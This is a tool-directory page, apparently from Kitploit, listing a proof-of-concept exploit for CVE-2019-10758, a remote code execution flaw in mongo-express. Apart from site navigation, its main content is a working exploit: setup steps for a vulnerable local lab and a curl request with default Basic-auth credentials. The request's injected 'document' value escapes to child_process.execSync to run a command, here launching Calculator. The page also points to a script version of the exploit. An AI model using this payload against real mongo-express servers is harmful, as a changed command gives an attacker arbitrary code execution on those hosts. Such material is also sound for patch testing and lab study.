Skip to content
KitploitKITPLOIT
ToolsBlog
Log in
Submit
ToolsBlog
Submit

Hacking, PenTest, and Cybersecurity Tools for Your Security Arsenal!

Kitploit is a directory of hacking, cybersecurity, and pentesting tools. Discover the latest project updates to find vulnerabilities, analyze systems, automate testing, and strengthen your security.

··Feeds·Contact·Privacy·© 2026 Kitploit

Tool Directory

Categories

View all categories
Loading categories
CVE-2019-10758 — Proof-of-concept exploit for CVE-2019-10758, demonstrating remote code execution in mongo-express via crafted document injection. Includes curl and script-based payloads. | Kitploit
Tools/GitHubGitHub/masahiro331/cve-2019-10758
Payload GenerationVulnerability AnalysisCode AnalysisExploitationWeb Application ExploitationPenetration Testing
GitHubmasahiro331/cve-2019-10758

CVE-2019-10758

Proof-of-concept exploit for CVE-2019-10758, demonstrating remote code execution in mongo-express via crafted document injection. Includes curl and script-based payloads.

View Repository
1112186 years agoReviewed by Kitploit

Most Popular

View all →

Discover the most used tools by our community.

Explore all tools

Browse our collection of tools

View all tools →
Share

CVE-2019-10758 PoC

Setup

docker run -p 27017:27017 -d mongo
npm install [email protected] 
cd node_modules/mongo-express/ && node app.js

cURL exploit

curl 'http://localhost:8081/checkValid' -H 'Authorization: Basic YWRtaW46cGFzcw=='  --data 'document=this.constructor.constructor("return process")().mainModule.require("child_process").execSync("/Applications/Calculator.app/Contents/MacOS/Calculator")'

Script exploit

node main.js
Download Tool